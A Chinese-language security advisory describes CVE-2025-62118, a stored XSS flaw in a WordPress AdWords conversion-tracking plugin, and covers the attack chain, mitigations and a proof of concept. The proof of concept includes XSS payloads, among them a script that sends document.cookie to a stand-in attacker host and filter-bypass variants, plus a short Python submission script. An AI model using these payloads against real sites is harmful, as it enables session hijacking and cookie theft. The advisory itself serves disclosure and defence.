CVE-2025-62118 WordPress AdWords Conversion Tracking Code插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62118

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

kcseopro AdWords Conversion Tracking Code WordPress插件

漏洞概述

CVE-2025-62118是WordPress插件AdWords Conversion Tracking Code中的一个存储型跨站脚本（Stored XSS）漏洞。该插件用于在WordPress网站上添加Google AdWords转化跟踪代码。漏洞源于该插件未能对用户输入进行充分的过滤和转义，导致恶意JavaScript代码可以被存储在数据库中。当其他用户访问包含恶意代码的页面时，攻击者注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、恶意重定向等攻击。由于该插件主要在管理员设置页面配置跟踪代码，低权限用户（如订阅者）也可能利用此漏洞对管理员进行XSS攻击。CVSS评分6.5，属于中等严重程度，攻击复杂度低但需要用户交互，且影响范围仅限于受污染页面的机密性和完整性。

技术细节

该存储型XSS漏洞存在于AdWords Conversion Tracking Code插件的设置页面中，具体在处理AdWords转化跟踪代码参数时未进行适当的输入验证和输出编码。攻击者可以在插件的配置字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>。由于插件将这些数据直接存储到WordPress数据库且在页面加载时未进行HTML实体转义，当管理员或用户在后台访问插件设置页面或前端页面渲染时，恶意脚本会被执行。漏洞利用条件包括：攻击者需要拥有WordPress账号（至少订阅者权限），能够访问插件设置界面或具有文章/页面编辑权限。攻击成功后可窃取管理员Cookie、劫持会话、修改页面内容或进行进一步的社会工程攻击。修复方案是在所有用户输入点使用sanitize_text_field()等WordPress安全函数，并在输出点使用esc_html()或esc_attr()进行HTML实体编码。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的WordPress版本和AdWords Conversion Tracking Code插件版本（<=1.0）

STEP 2

步骤2

初始访问：攻击者获取WordPress账号（注册订阅者账户或利用已有低权限账号）

STEP 3

步骤3

漏洞利用：攻击者访问插件设置页面，在AdWords跟踪代码配置字段中注入存储型XSS Payload

STEP 4

步骤4

恶意代码存储：Payload被保存到WordPress数据库，未经过滤或转义处理

STEP 5

步骤5

触发阶段：管理员或用户访问插件设置页面或前端页面，恶意脚本在浏览器中执行

STEP 6

步骤6

攻击成功：攻击者通过执行的JavaScript窃取Cookie、会话令牌或进行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress AdWords Conversion Tracking Code Stored XSS PoC -->
<!-- 攻击者需要在插件设置中注入以下Payload -->

<!-- Payload 1: 基本XSS测试 -->
<script>alert('XSS')</script>

<!-- Payload 2: Cookie窃取 -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

<!-- Payload 3: 绕过过滤的变形Payload -->
<img src=x onerror=alert(document.domain)>
<svg/onload=alert(document.cookie)>

<!-- 利用方式： -->
<!-- 1. 登录WordPress后台（最低订阅者权限） -->
<!-- 2. 导航到插件设置页面（Settings > AdWords Conversion Tracking） -->
<!-- 3. 在跟踪代码配置字段中输入上述恶意Payload -->
<!-- 4. 保存设置后，当管理员访问设置页面或前端页面时，脚本将执行 -->

<!-- 自动化检测脚本 -->
import requests

target_url = 'http://target-wordpress-site/wp-admin/admin.php?page=adwords-conversion-tracking'
payload = '<script>alert(document.cookie)</script>'

session = requests.Session()
# 登录获取有效会话
session.post(login_url, data={'username': 'attacker', 'password': 'password'})

# 提交恶意Payload
session.post(target_url, data={'adwords_code': payload})

影响范围

kcseopro AdWords Conversion Tracking Code插件 <= 1.0

防御指南

临时缓解措施

临时缓解措施包括：1）限制低权限用户访问插件设置页面；2）移除或禁用AdWords Conversion Tracking Code插件直到修复版本发布；3）使用WordPress安全插件（如Wordfence）添加额外的输入过滤层；4）实施严格的CSP策略防止XSS执行；5）监控管理员账户的异常活动日志。